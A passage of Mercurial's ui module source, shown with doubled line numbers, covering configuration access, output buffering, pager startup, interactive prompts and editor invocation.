914 def configdefault(self, section, name):
915 """returns the default value of the config item"""
915 """returns the default value of the config item"""
916 item = self._knownconfig.get(section, {}).get(name)
916 item = self._knownconfig.get(section, {}).get(name)
917 itemdefault = None
917 itemdefault = None
918 if item is not None:
918 if item is not None:
919 if callable(item.default):
919 if callable(item.default):
920 itemdefault = item.default()
920 itemdefault = item.default()
921 else:
921 else:
922 itemdefault = item.default
922 itemdefault = item.default
923 return itemdefault
923 return itemdefault
924
924
925 def hasconfig(self, section, name, untrusted=False):
925 def hasconfig(self, section, name, untrusted=False):
926 return self._data(untrusted).hasitem(section, name)
926 return self._data(untrusted).hasitem(section, name)
927
927
928 def has_section(self, section, untrusted=False):
928 def has_section(self, section, untrusted=False):
929 '''tell whether section exists in config.'''
929 '''tell whether section exists in config.'''
930 return section in self._data(untrusted)
930 return section in self._data(untrusted)
931
931
932 def configitems(self, section, untrusted=False, ignoresub=False):
932 def configitems(self, section, untrusted=False, ignoresub=False):
933 items = self._data(untrusted).items(section)
933 items = self._data(untrusted).items(section)
934 if ignoresub:
934 if ignoresub:
935 items = [i for i in items if b':' not in i[0]]
935 items = [i for i in items if b':' not in i[0]]
936 if self.debugflag and not untrusted and self._reportuntrusted:
936 if self.debugflag and not untrusted and self._reportuntrusted:
937 for k, v in self._ucfg.items(section):
937 for k, v in self._ucfg.items(section):
938 if self._tcfg.get(section, k) != v:
938 if self._tcfg.get(section, k) != v:
939 self.debug(
939 self.debug(
940 b"ignoring untrusted configuration option "
940 b"ignoring untrusted configuration option "
941 b"%s.%s = %s\n" % (section, k, v)
941 b"%s.%s = %s\n" % (section, k, v)
942 )
942 )
943 return items
943 return items
944
944
945 def walkconfig(self, untrusted=False):
945 def walkconfig(self, untrusted=False):
946 cfg = self._data(untrusted)
946 cfg = self._data(untrusted)
947 for section in cfg.sections():
947 for section in cfg.sections():
948 for name, value in self.configitems(section, untrusted):
948 for name, value in self.configitems(section, untrusted):
949 yield section, name, value
949 yield section, name, value
950
950
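    # Illustrative sketch (not part of this module): walkconfig() yields
    # every (section, name, value) triple from the merged configuration,
    # which is essentially what `hg showconfig` prints. Assuming `u` is a
    # configured ui instance:
    #
    #   for section, name, value in u.walkconfig():
    #       u.write(b'%s.%s=%s\n' % (section, name, value))
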
    def plain(self, feature=None):
        """is plain mode active?

        Plain mode means that all configuration variables which affect
        the behavior and output of Mercurial should be
        ignored. Additionally, the output should be stable,
        reproducible and suitable for use in scripts or applications.

        The only way to trigger plain mode is by setting either the
        `HGPLAIN' or `HGPLAINEXCEPT' environment variables.

        The return value can either be
        - False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
        - False if feature is disabled by default and not included in HGPLAIN
        - True otherwise
        """
        if (
            b'HGPLAIN' not in encoding.environ
            and b'HGPLAINEXCEPT' not in encoding.environ
        ):
            return False
        exceptions = (
            encoding.environ.get(b'HGPLAINEXCEPT', b'').strip().split(b',')
        )
        # TODO: add support for HGPLAIN=+feature,-feature syntax
        if b'+strictflags' not in encoding.environ.get(b'HGPLAIN', b'').split(
            b','
        ):
            exceptions.append(b'strictflags')
        if feature and exceptions:
            return feature not in exceptions
        return True

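    # Illustrative sketch (not part of this module) of how the environment
    # drives plain():
    #
    #   HGPLAIN=1            -> plain() and plain(b'i18n') are True
    #   HGPLAINEXCEPT=i18n   -> plain(b'i18n') is False, plain() is True
    #   neither variable set -> plain() is False
    #
    # 'strictflags' is additionally treated as an exception unless HGPLAIN
    # contains '+strictflags'.
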
    def username(self, acceptempty=False):
        """Return default username to be used in commits.

        Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL;
        searching stops at the first one that is set.
        If not found and acceptempty is True, returns None.
        If not found and ui.askusername is True, ask the user, else use
        ($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
        If no username could be found, raise an Abort error.
        """
        user = encoding.environ.get(b"HGUSER")
        if user is None:
            user = self.config(b"ui", b"username")
            if user is not None:
                user = os.path.expandvars(user)
        if user is None:
            user = encoding.environ.get(b"EMAIL")
        if user is None and acceptempty:
            return user
        if user is None and self.configbool(b"ui", b"askusername"):
            user = self.prompt(_(b"enter a commit username:"), default=None)
        if user is None and not self.interactive():
            try:
                user = b'%s@%s' % (
                    procutil.getuser(),
                    encoding.strtolocal(socket.getfqdn()),
                )
                self.warn(_(b"no username found, using '%s' instead\n") % user)
            except KeyError:
                pass
        if not user:
            raise error.Abort(
                _(b'no username supplied'),
                hint=_(b"use 'hg config --edit' " b'to set your username'),
            )
        if b"\n" in user:
            raise error.Abort(
                _(b"username %r contains a newline\n") % pycompat.bytestr(user)
            )
        return user

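    # Illustrative hgrc snippet (the value is an assumption for the example,
    # not shipped configuration) showing where username() usually finds its
    # value when $HGUSER and $EMAIL are unset:
    #
    #   [ui]
    #   username = Jane Doe <jane@example.com>
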
    def shortuser(self, user):
        """Return a short representation of a user name or email address."""
        if not self.verbose:
            user = stringutil.shortuser(user)
        return user

    def expandpath(self, loc, default=None):
        """Return repository location relative to cwd or from [paths]"""
        try:
            p = self.getpath(loc)
            if p:
                return p.rawloc
        except error.RepoError:
            pass

        if default:
            try:
                p = self.getpath(default)
                if p:
                    return p.rawloc
            except error.RepoError:
                pass

        return loc

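    # Illustrative sketch (hypothetical path alias): with
    #
    #   [paths]
    #   upstream = https://example.com/repo
    #
    # expandpath(b'upstream') is expected to return the raw location
    # b'https://example.com/repo', while an unknown name falls through
    # and is returned unchanged.
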
    @util.propertycache
    def paths(self):
        return paths(self)

    def getpath(self, *args, **kwargs):
        """see paths.getpath for details

        This method exists because `getpath` needs a ui for potential
        warning messages.
        """
        return self.paths.getpath(self, *args, **kwargs)

    @property
    def fout(self):
        return self._fout

    @fout.setter
    def fout(self, f):
        self._fout = f
        self._fmsgout, self._fmsgerr = _selectmsgdests(self)

    @property
    def ferr(self):
        return self._ferr

    @ferr.setter
    def ferr(self, f):
        self._ferr = f
        self._fmsgout, self._fmsgerr = _selectmsgdests(self)

    @property
    def fin(self):
        return self._fin

    @fin.setter
    def fin(self, f):
        self._fin = f

    @property
    def fmsg(self):
        """Stream dedicated for status/error messages; may be None if
        fout/ferr are used"""
        return self._fmsg

    @fmsg.setter
    def fmsg(self, f):
        self._fmsg = f
        self._fmsgout, self._fmsgerr = _selectmsgdests(self)

    def pushbuffer(self, error=False, subproc=False, labeled=False):
        """install a buffer to capture standard output of the ui object

        If error is True, the error output will be captured too.

        If subproc is True, output from subprocesses (typically hooks) will be
        captured too.

        If labeled is True, any labels associated with buffered
        output will be handled. By default, this has no effect
        on the output returned, but extensions and GUI tools may
        handle this argument and return styled output. If output
        is being buffered so it can be captured and parsed or
        processed, labeled should not be set to True.
        """
        self._buffers.append([])
        self._bufferstates.append((error, subproc, labeled))
        self._bufferapplylabels = labeled

    def popbuffer(self):
        '''pop the last buffer and return the buffered output'''
        self._bufferstates.pop()
        if self._bufferstates:
            self._bufferapplylabels = self._bufferstates[-1][2]
        else:
            self._bufferapplylabels = None

        return b"".join(self._buffers.pop())

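    # Illustrative sketch (not part of this module): capturing output with
    # the buffer stack, assuming `u` is a ui instance:
    #
    #   u.pushbuffer()
    #   u.write(b'captured\n')
    #   data = u.popbuffer()    # b'captured\n'
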
    def _isbuffered(self, dest):
        if dest is self._fout:
            return bool(self._buffers)
        if dest is self._ferr:
            return bool(self._bufferstates and self._bufferstates[-1][0])
        return False

    def canwritewithoutlabels(self):
        '''check if write skips the label'''
        if self._buffers and not self._bufferapplylabels:
            return True
        return self._colormode is None

    def canbatchlabeledwrites(self):
        '''check if write calls with labels are batchable'''
        # Windows color printing is special, see ``write``.
        return self._colormode != b'win32'

    def write(self, *args, **opts):
        """write args to output

        By default, this method simply writes to the buffer or stdout.
        Color mode can be set on the UI class to have the output decorated
        with a color modifier before being written to stdout.

        The color used is controlled by an optional keyword argument, "label".
        This should be a string containing label names separated by space.
        Label names take the form of "topic.type". For example, ui.debug()
        issues a label of "ui.debug".

        Progress reports via stderr are normally cleared before writing, as
        stdout and stderr go to the same terminal. This can be skipped with
        the optional keyword argument "keepprogressbar". The progress bar
        will continue to occupy a partial line on stderr in that case.
        This functionality is intended for use when Mercurial acts as a data
        source in a pipe.

        When labeling output for a specific command, a label of
        "cmdname.type" is recommended. For example, status issues
        a label of "status.modified" for modified files.
        """
        dest = self._fout

        # inlined _write() for speed
        if self._buffers:
            label = opts.get('label', b'')
            if label and self._bufferapplylabels:
                self._buffers[-1].extend(self.label(a, label) for a in args)
            else:
                self._buffers[-1].extend(args)
            return

        # inlined _writenobuf() for speed
        if not opts.get('keepprogressbar', False):
            self._progclear()
        msg = b''.join(args)

        # opencode timeblockedsection because this is a critical path
        starttime = util.timer()
        try:
            if self._colormode == b'win32':
                # windows color printing is its own can of crab, defer to
                # the color module and that is it.
                color.win32print(self, dest.write, msg, **opts)
            else:
                if self._colormode is not None:
                    label = opts.get('label', b'')
                    msg = self.label(msg, label)
                dest.write(msg)
        except IOError as err:
            raise error.StdioError(err)
        finally:
            self._blockedtimes[b'stdio_blocked'] += (
                util.timer() - starttime
            ) * 1000

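    # Illustrative sketch (hypothetical call site): labeling output so the
    # color machinery can decorate it, assuming `u` is a ui instance:
    #
    #   u.write(b'M some/file.py\n', label=b'status.modified')
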
    def write_err(self, *args, **opts):
        self._write(self._ferr, *args, **opts)

    def _write(self, dest, *args, **opts):
        # update write() as well if you touch this code
        if self._isbuffered(dest):
            label = opts.get('label', b'')
            if label and self._bufferapplylabels:
                self._buffers[-1].extend(self.label(a, label) for a in args)
            else:
                self._buffers[-1].extend(args)
        else:
            self._writenobuf(dest, *args, **opts)

    def _writenobuf(self, dest, *args, **opts):
        # update write() as well if you touch this code
        if not opts.get('keepprogressbar', False):
            self._progclear()
        msg = b''.join(args)

        # opencode timeblockedsection because this is a critical path
        starttime = util.timer()
        try:
            if dest is self._ferr and not getattr(self._fout, 'closed', False):
                self._fout.flush()
            if getattr(dest, 'structured', False):
                # channel for machine-readable output with metadata, where
                # no extra colorization is necessary.
                dest.write(msg, **opts)
            elif self._colormode == b'win32':
                # windows color printing is its own can of crab, defer to
                # the color module and that is it.
                color.win32print(self, dest.write, msg, **opts)
            else:
                if self._colormode is not None:
                    label = opts.get('label', b'')
                    msg = self.label(msg, label)
                dest.write(msg)
            # stderr may be buffered under win32 when redirected to files,
            # including stdout.
            if dest is self._ferr and not getattr(dest, 'closed', False):
                dest.flush()
        except IOError as err:
            if dest is self._ferr and err.errno in (
                errno.EPIPE,
                errno.EIO,
                errno.EBADF,
            ):
                # no way to report the error, so ignore it
                return
            raise error.StdioError(err)
        finally:
            self._blockedtimes[b'stdio_blocked'] += (
                util.timer() - starttime
            ) * 1000

    def _writemsg(self, dest, *args, **opts):
        timestamp = self.showtimestamp and opts.get('type') in {
            b'debug',
            b'error',
            b'note',
            b'status',
            b'warning',
        }
        if timestamp:
            args = (
                b'[%s] '
                % pycompat.bytestr(datetime.datetime.now().isoformat()),
            ) + args
        _writemsgwith(self._write, dest, *args, **opts)
        if timestamp:
            dest.flush()

    def _writemsgnobuf(self, dest, *args, **opts):
        _writemsgwith(self._writenobuf, dest, *args, **opts)

    def flush(self):
        # opencode timeblockedsection because this is a critical path
        starttime = util.timer()
        try:
            try:
                self._fout.flush()
            except IOError as err:
                if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
                    raise error.StdioError(err)
            finally:
                try:
                    self._ferr.flush()
                except IOError as err:
                    if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
                        raise error.StdioError(err)
        finally:
            self._blockedtimes[b'stdio_blocked'] += (
                util.timer() - starttime
            ) * 1000

    def _isatty(self, fh):
        if self.configbool(b'ui', b'nontty'):
            return False
        return procutil.isatty(fh)

    def protectfinout(self):
        """Duplicate ui streams and redirect original if they are stdio

        Returns (fin, fout) which point to the original ui fds, but may be
        copies of them. The returned streams can be considered "owned" in that
        print(), exec(), etc. never reach them.
        """
        if self._finoutredirected:
            # if already redirected, protectstdio() would just create another
            # nullfd pair, which is equivalent to returning self._fin/_fout.
            return self._fin, self._fout
        fin, fout = procutil.protectstdio(self._fin, self._fout)
        self._finoutredirected = (fin, fout) != (self._fin, self._fout)
        return fin, fout

    def restorefinout(self, fin, fout):
        """Restore ui streams from possibly duplicated (fin, fout)"""
        if (fin, fout) == (self._fin, self._fout):
            return
        procutil.restorestdio(self._fin, self._fout, fin, fout)
        # protectfinout() won't create more than one pair of duplicated
        # streams, so we can just turn the redirection flag off.
        self._finoutredirected = False

    @contextlib.contextmanager
    def protectedfinout(self):
        """Run code block with protected standard streams"""
        fin, fout = self.protectfinout()
        try:
            yield fin, fout
        finally:
            self.restorefinout(fin, fout)

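    # Illustrative sketch (not part of this module): running code with the
    # standard streams protected, assuming `u` is a ui instance:
    #
    #   with u.protectedfinout() as (fin, fout):
    #       fout.write(b'goes to the original stdout\n')
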
    def disablepager(self):
        self._disablepager = True

    def pager(self, command):
        """Start a pager for subsequent command output.

        Commands which produce a long stream of output should call
        this function to activate the user's preferred pagination
        mechanism (which may be no pager). Calling this function
        precludes any future use of interactive functionality, such as
        prompting the user or activating curses.

        Args:
          command: The full, non-aliased name of the command. That is, "log"
              not "history", "summary" not "summ", etc.
        """
        if self._disablepager or self.pageractive:
            # whether and how to page has already been determined
            return

        if not command.startswith(b'internal-always-') and (
            # explicit --pager=on (= 'internal-always-' prefix) should
            # take precedence over disabling factors below
            command in self.configlist(b'pager', b'ignore')
            or not self.configbool(b'ui', b'paginate')
            or not self.configbool(b'pager', b'attend-' + command, True)
            or encoding.environ.get(b'TERM') == b'dumb'
            # TODO: if we want to allow HGPLAINEXCEPT=pager,
            # formatted() will need some adjustment.
            or not self.formatted()
            or self.plain()
            or self._buffers
            # TODO: expose debugger-enabled on the UI object
            or b'--debugger' in pycompat.sysargv
        ):
            # We only want to paginate if the ui appears to be
            # interactive, the user didn't say HGPLAIN or
            # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
            return

        pagercmd = self.config(b'pager', b'pager', rcutil.fallbackpager)
        if not pagercmd:
            return

        pagerenv = {}
        for name, value in rcutil.defaultpagerenv().items():
            if name not in encoding.environ:
                pagerenv[name] = value

        self.debug(
            b'starting pager for command %s\n' % stringutil.pprint(command)
        )
        self.flush()

        wasformatted = self.formatted()
        if util.safehasattr(signal, b"SIGPIPE"):
            signal.signal(signal.SIGPIPE, _catchterm)
        if self._runpager(pagercmd, pagerenv):
            self.pageractive = True
            # Preserve the formatted-ness of the UI. This is important
            # because we mess with stdout, which might confuse
            # auto-detection of things being formatted.
            self.setconfig(b'ui', b'formatted', wasformatted, b'pager')
            self.setconfig(b'ui', b'interactive', False, b'pager')

            # If pagermode differs from color.mode, reconfigure color now that
            # pageractive is set.
            cm = self._colormode
            if cm != self.config(b'color', b'pagermode', cm):
                color.setup(self)
        else:
            # If the pager can't be spawned in dispatch when --pager=on is
            # given, don't try again when the command runs, to avoid a duplicate
            # warning about a missing pager command.
            self.disablepager()

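    # Illustrative hgrc snippet (the values are assumptions for the example)
    # showing the knobs pager() consults above:
    #
    #   [pager]
    #   pager = less -FRX
    #   ignore = version, help
    #   attend-log = no
    #
    #   [ui]
    #   paginate = yes
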
    def _runpager(self, command, env=None):
        """Actually start the pager and set up file descriptors.

        This is separate in part so that extensions (like chg) can
        override how a pager is invoked.
        """
        if command == b'cat':
            # Save ourselves some work.
            return False
        # If the command doesn't contain any of these characters, we
        # assume it's a binary and exec it directly. This means for
        # simple pager command configurations, we can degrade
        # gracefully and tell the user about their broken pager.
        shell = any(c in command for c in b"|&;<>()$`\\\"' \t\n*?[#~=%")

        if pycompat.iswindows and not shell:
            # Windows' built-in `more` cannot be invoked with shell=False, but
            # its `more.com` can. Hide this implementation detail from the
            # user so we can also get sane bad PAGER behavior. MSYS has
            # `more.exe`, so do a cmd.exe style resolution of the executable to
            # determine which one to use.
            fullcmd = procutil.findexe(command)
            if not fullcmd:
                self.warn(
                    _(b"missing pager command '%s', skipping pager\n") % command
                )
                return False

            command = fullcmd

        try:
            pager = subprocess.Popen(
                procutil.tonativestr(command),
                shell=shell,
                bufsize=-1,
                close_fds=procutil.closefds,
                stdin=subprocess.PIPE,
                stdout=procutil.stdout,
                stderr=procutil.stderr,
                env=procutil.tonativeenv(procutil.shellenviron(env)),
            )
        except OSError as e:
            if e.errno == errno.ENOENT and not shell:
                self.warn(
                    _(b"missing pager command '%s', skipping pager\n") % command
                )
                return False
            raise

        # back up original file descriptors
        stdoutfd = os.dup(procutil.stdout.fileno())
        stderrfd = os.dup(procutil.stderr.fileno())

        os.dup2(pager.stdin.fileno(), procutil.stdout.fileno())
        if self._isatty(procutil.stderr):
            os.dup2(pager.stdin.fileno(), procutil.stderr.fileno())

        @self.atexit
        def killpager():
            if util.safehasattr(signal, b"SIGINT"):
                signal.signal(signal.SIGINT, signal.SIG_IGN)
            # restore original fds, closing pager.stdin copies in the process
            os.dup2(stdoutfd, procutil.stdout.fileno())
            os.dup2(stderrfd, procutil.stderr.fileno())
            pager.stdin.close()
            pager.wait()

        return True

    @property
    def _exithandlers(self):
        return _reqexithandlers

    def atexit(self, func, *args, **kwargs):
        """register a function to run after dispatching a request

        Handlers do not stay registered across request boundaries."""
        self._exithandlers.append((func, args, kwargs))
        return func

    def interface(self, feature):
        """what interface to use for interactive console features?

        The interface is controlled by the value of `ui.interface` but also by
        the value of feature-specific configuration. For example:

        ui.interface.histedit = text
        ui.interface.chunkselector = curses

        Here the features are "histedit" and "chunkselector".

        The configuration above means that the default interface for commands
        is curses, the interface for histedit is text, and the interface for
        selecting chunks is crecord (the best curses interface available).

        Consider the following example:
        ui.interface = curses
        ui.interface.histedit = text

        Then histedit will use the text interface and chunkselector will use
        the default curses interface (crecord at the moment).
        """
        alldefaults = frozenset([b"text", b"curses"])

        featureinterfaces = {
            b"chunkselector": [
                b"text",
                b"curses",
            ],
            b"histedit": [
                b"text",
                b"curses",
            ],
        }

        # Feature-specific interface
        if feature not in featureinterfaces.keys():
            # Programming error, not user error
            raise ValueError(b"Unknown feature requested %s" % feature)

        availableinterfaces = frozenset(featureinterfaces[feature])
        if alldefaults > availableinterfaces:
            # Programming error, not user error. We need a use case to
            # define the right thing to do here.
            raise ValueError(
                b"Feature %s does not handle all default interfaces" % feature
            )

        if self.plain() or encoding.environ.get(b'TERM') == b'dumb':
            return b"text"

        # Default interface for all the features
        defaultinterface = b"text"
        i = self.config(b"ui", b"interface")
        if i in alldefaults:
            defaultinterface = i

        choseninterface = defaultinterface
        f = self.config(b"ui", b"interface.%s" % feature)
        if f in availableinterfaces:
            choseninterface = f

        if i is not None and defaultinterface != i:
            if f is not None:
                self.warn(_(b"invalid value for ui.interface: %s\n") % (i,))
            else:
                self.warn(
                    _(b"invalid value for ui.interface: %s (using %s)\n")
                    % (i, choseninterface)
                )
        if f is not None and choseninterface != f:
            self.warn(
                _(b"invalid value for ui.interface.%s: %s (using %s)\n")
                % (feature, f, choseninterface)
            )

        return choseninterface

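    # Illustrative sketch (hypothetical call site): a command asking which
    # interface to use for a feature, assuming `u` is a ui instance:
    #
    #   if u.interface(b'chunkselector') == b'curses':
    #       pass  # launch the curses chunk selector
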
    def interactive(self):
        """is interactive input allowed?

        An interactive session is a session where input can be reasonably read
        from `sys.stdin'. If this function returns false, any attempt to read
        from stdin should fail with an error, unless a sensible default has been
        specified.

        Interactiveness is triggered by the value of the `ui.interactive'
        configuration variable or - if it is unset - when `sys.stdin' points
        to a terminal device.

        This function refers to input only; for output, see `ui.formatted()'.
        """
        i = self.configbool(b"ui", b"interactive")
        if i is None:
            # some environments replace stdin without implementing isatty
            # usually those are non-interactive
            return self._isatty(self._fin)

        return i

    def termwidth(self):
        """how wide is the terminal in columns?"""
        if b'COLUMNS' in encoding.environ:
            try:
                return int(encoding.environ[b'COLUMNS'])
            except ValueError:
                pass
        return scmutil.termsize(self)[0]

    def formatted(self):
        """should formatted output be used?

        It is often desirable to format the output to suit the output medium.
        Examples of this are truncating long lines or colorizing messages.
        However, this is often not desirable when piping output into other
        utilities, e.g. `grep'.

        Formatted output is triggered by the value of the `ui.formatted'
        configuration variable or - if it is unset - when `sys.stdout' points
        to a terminal device. Please note that `ui.formatted' should be
        considered an implementation detail; it is not intended for use outside
        Mercurial or its extensions.

        This function refers to output only; for input, see `ui.interactive()'.
        This function always returns false when in plain mode, see `ui.plain()'.
        """
        if self.plain():
            return False

        i = self.configbool(b"ui", b"formatted")
        if i is None:
            # some environments replace stdout without implementing isatty
            # usually those are non-interactive
            return self._isatty(self._fout)

        return i

    def _readline(self, prompt=b' ', promptopts=None):
        # Replacing stdin/stdout temporarily is a hard problem on Python 3
        # because they have to be text streams with *no buffering*. Instead,
        # we use rawinput() only if call_readline() will be invoked by
        # PyOS_Readline(), so no I/O will be made at the Python layer.
        usereadline = (
            self._isatty(self._fin)
            and self._isatty(self._fout)
            and procutil.isstdin(self._fin)
            and procutil.isstdout(self._fout)
        )
        if usereadline:
            try:
                # magically add command line editing support, where
                # available
                import readline

                # force demandimport to really load the module
                readline.read_history_file
                # windows sometimes raises something other than ImportError
            except Exception:
                usereadline = False

        if self._colormode == b'win32' or not usereadline:
            if not promptopts:
                promptopts = {}
            self._writemsgnobuf(
                self._fmsgout, prompt, type=b'prompt', **promptopts
            )
            self.flush()
            prompt = b' '
        else:
            prompt = self.label(prompt, b'ui.prompt') + b' '

        # prompt ' ' must exist; otherwise readline may delete entire line
        # - http://bugs.python.org/issue12833
        with self.timeblockedsection(b'stdio'):
            if usereadline:
                self.flush()
                prompt = encoding.strfromlocal(prompt)
                line = encoding.strtolocal(pycompat.rawinput(prompt))
                # When stdin is in binary mode on Windows, it can cause
                # raw_input() to emit an extra trailing carriage return
                if pycompat.oslinesep == b'\r\n' and line.endswith(b'\r'):
                    line = line[:-1]
            else:
                self._fout.write(pycompat.bytestr(prompt))
                self._fout.flush()
                line = self._fin.readline()
                if not line:
                    raise EOFError
                line = line.rstrip(pycompat.oslinesep)

        return line

    def prompt(self, msg, default=b"y"):
        """Prompt user with msg, read response.
        If ui is not interactive, the default is returned.
        """
        return self._prompt(msg, default=default)

    def _prompt(self, msg, **opts):
        default = opts['default']
        if not self.interactive():
            self._writemsg(self._fmsgout, msg, b' ', type=b'prompt', **opts)
            self._writemsg(
                self._fmsgout, default or b'', b"\n", type=b'promptecho'
            )
            return default
        try:
            r = self._readline(prompt=msg, promptopts=opts)
            if not r:
                r = default
            if self.configbool(b'ui', b'promptecho'):
                self._writemsg(
                    self._fmsgout, r or b'', b"\n", type=b'promptecho'
                )
            return r
        except EOFError:
            raise error.ResponseExpected()

    @staticmethod
    def extractchoices(prompt):
        """Extract prompt message and list of choices from specified prompt.

        This returns a tuple "(message, choices)", where "choices" is a
        list of tuples "(response character, text without &)".

        >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
        ('awake? ', [('y', 'Yes'), ('n', 'No')])
        >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
        ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
        >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
        ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
        """

        # Sadly, the prompt string may have been built with a filename
        # containing "$$" so let's try to find the first valid-looking
        # prompt to start parsing. Sadly, we also can't rely on
        # choices containing spaces, ASCII, or basically anything
        # except an ampersand followed by a character.
        m = re.match(br'(?s)(.+?)\$\$([^$]*&[^ $].*)', prompt)
        msg = m.group(1)
        choices = [p.strip(b' ') for p in m.group(2).split(b'$$')]

        def choicetuple(s):
            ampidx = s.index(b'&')
            return s[ampidx + 1 : ampidx + 2].lower(), s.replace(b'&', b'', 1)

        return (msg, [choicetuple(s) for s in choices])

    def promptchoice(self, prompt, default=0):
        """Prompt user with a message, read response, and ensure it matches
        one of the provided choices. The prompt is formatted as follows:

           "would you like fries with that (Yn)? $$ &Yes $$ &No"

        The index of the choice is returned. Responses are case
        insensitive. If ui is not interactive, the default is
        returned.
        """

        msg, choices = self.extractchoices(prompt)
        resps = [r for r, t in choices]
        while True:
            r = self._prompt(msg, default=resps[default], choices=choices)
            if r.lower() in resps:
                return resps.index(r.lower())
            # TODO: shouldn't it be a warning?
            self._writemsg(self._fmsgout, _(b"unrecognized response\n"))

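    # Illustrative sketch (hypothetical prompt): promptchoice() returns the
    # index of the selected response, assuming `u` is a ui instance:
    #
    #   idx = u.promptchoice(b'apply change (yn)?$$ &Yes $$ &No', default=0)
    #   # idx == 0 for "y", 1 for "n"; the default is used when the ui is
    #   # not interactive
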
    def getpass(self, prompt=None, default=None):
        if not self.interactive():
            return default
        try:
            self._writemsg(
                self._fmsgerr,
                prompt or _(b'password: '),
                type=b'prompt',
                password=True,
            )
            # disable getpass() only if explicitly specified. it's still valid
            # to interact with tty even if fin is not a tty.
            with self.timeblockedsection(b'stdio'):
                if self.configbool(b'ui', b'nontty'):
                    l = self._fin.readline()
                    if not l:
                        raise EOFError
                    return l.rstrip(b'\n')
                else:
                    return encoding.strtolocal(getpass.getpass(''))
        except EOFError:
            raise error.ResponseExpected()

    def status(self, *msg, **opts):
        """write status message to output (if ui.quiet is False)

        This adds an output label of "ui.status".
        """
        if not self.quiet:
            self._writemsg(self._fmsgout, type=b'status', *msg, **opts)

    def warn(self, *msg, **opts):
        """write warning message to output (stderr)

        This adds an output label of "ui.warning".
        """
        self._writemsg(self._fmsgerr, type=b'warning', *msg, **opts)

    def error(self, *msg, **opts):
        """write error message to output (stderr)

        This adds an output label of "ui.error".
        """
        self._writemsg(self._fmsgerr, type=b'error', *msg, **opts)

    def note(self, *msg, **opts):
        """write note to output (if ui.verbose is True)

        This adds an output label of "ui.note".
        """
        if self.verbose:
            self._writemsg(self._fmsgout, type=b'note', *msg, **opts)

    def debug(self, *msg, **opts):
        """write debug message to output (if ui.debugflag is True)

        This adds an output label of "ui.debug".
        """
        if self.debugflag:
            self._writemsg(self._fmsgout, type=b'debug', *msg, **opts)
            self.log(b'debug', b'%s', b''.join(msg))

    # Aliases to defeat check-code.
    statusnoi18n = status
    notenoi18n = note
    warnnoi18n = warn
    writenoi18n = write

    def edit(
        self,
        text,
        user,
        extra=None,
        editform=None,
        pending=None,
        repopath=None,
        action=None,
    ):
        if action is None:
            self.develwarn(
                b'action is None but will soon be a required '
1841 b'action is None but will soon be a required '
1842 b'parameter to ui.edit()'
1842 b'parameter to ui.edit()'
1843 )
1843 )
1844 extra_defaults = {
1844 extra_defaults = {
1845 b'prefix': b'editor',
1845 b'prefix': b'editor',
1846 b'suffix': b'.txt',
1846 b'suffix': b'.txt',
1847 }
1847 }
1848 if extra is not None:
1848 if extra is not None:
1849 if extra.get(b'suffix') is not None:
1849 if extra.get(b'suffix') is not None:
1850 self.develwarn(
1850 self.develwarn(
1851 b'extra.suffix is not None but will soon be '
1851 b'extra.suffix is not None but will soon be '
1852 b'ignored by ui.edit()'
1852 b'ignored by ui.edit()'
1853 )
1853 )
1854 extra_defaults.update(extra)
1854 extra_defaults.update(extra)
1855 extra = extra_defaults
1855 extra = extra_defaults
1856
1856
1857 if action == b'diff':
1857 if action == b'diff':
1858 suffix = b'.diff'
1858 suffix = b'.diff'
1859 elif action:
1859 elif action:
1860 suffix = b'.%s.hg.txt' % action
1860 suffix = b'.%s.hg.txt' % action
1861 else:
1861 else:
1862 suffix = extra[b'suffix']
1862 suffix = extra[b'suffix']
1863
1863
1864 rdir = None
1864 rdir = None
1865 if self.configbool(b'experimental', b'editortmpinhg'):
1865 if self.configbool(b'experimental', b'editortmpinhg'):
1866 rdir = repopath
1866 rdir = repopath
1867 (fd, name) = pycompat.mkstemp(
1867 (fd, name) = pycompat.mkstemp(
1868 prefix=b'hg-' + extra[b'prefix'] + b'-', suffix=suffix, dir=rdir
1868 prefix=b'hg-' + extra[b'prefix'] + b'-', suffix=suffix, dir=rdir
1869 )
1869 )
1870 try:
1870 try:
1871 with os.fdopen(fd, 'wb') as f:
1871 with os.fdopen(fd, 'wb') as f:
1872 f.write(util.tonativeeol(text))
1872 f.write(util.tonativeeol(text))
1873
1873
1874 environ = {b'HGUSER': user}
1874 environ = {b'HGUSER': user}
1875 if b'transplant_source' in extra:
1875 if b'transplant_source' in extra:
1876 environ.update(
1876 environ.update(
1877 {b'HGREVISION': hex(extra[b'transplant_source'])}
1877 {b'HGREVISION': hex(extra[b'transplant_source'])}
1878 )
1878 )
1879 for label in (b'intermediate-source', b'source', b'rebase_source'):
1879 for label in (b'intermediate-source', b'source', b'rebase_source'):
1880 if label in extra:
1880 if label in extra:
1881 environ.update({b'HGREVISION': extra[label]})
1881 environ.update({b'HGREVISION': extra[label]})
1882 break
1882 break
1883 if editform:
1883 if editform:
1884 environ.update({b'HGEDITFORM': editform})
1884 environ.update({b'HGEDITFORM': editform})
1885 if pending:
1885 if pending:
1886 environ.update({b'HG_PENDING': pending})
1886 environ.update({b'HG_PENDING': pending})
1887
1887
1888 editor = self.geteditor()
1888 editor = self.geteditor()
1889
1889
1890 self.system(
1890 self.system(
1891 b"%s \"%s\"" % (editor, name),
1891 b"%s \"%s\"" % (editor, name),
1892 environ=environ,
1892 environ=environ,
1893 onerr=error.CanceledError,
1893 onerr=error.CanceledError,
1894 errprefix=_(b"edit failed"),
1894 errprefix=_(b"edit failed"),
1895 blockedtag=b'editor',
1895 blockedtag=b'editor',
1896 )
1896 )
1897
1897
1898 with open(name, 'rb') as f:
1898 with open(name, 'rb') as f:
1899 t = util.fromnativeeol(f.read())
1899 t = util.fromnativeeol(f.read())
1900 finally:
1900 finally:
1901 os.unlink(name)
1901 os.unlink(name)
1902
1902
1903 return t
1903 return t
1904
1904
1905 def system(
1905 def system(
1906 self,
1906 self,
1907 cmd,
1907 cmd,
1908 environ=None,
1908 environ=None,
1909 cwd=None,
1909 cwd=None,
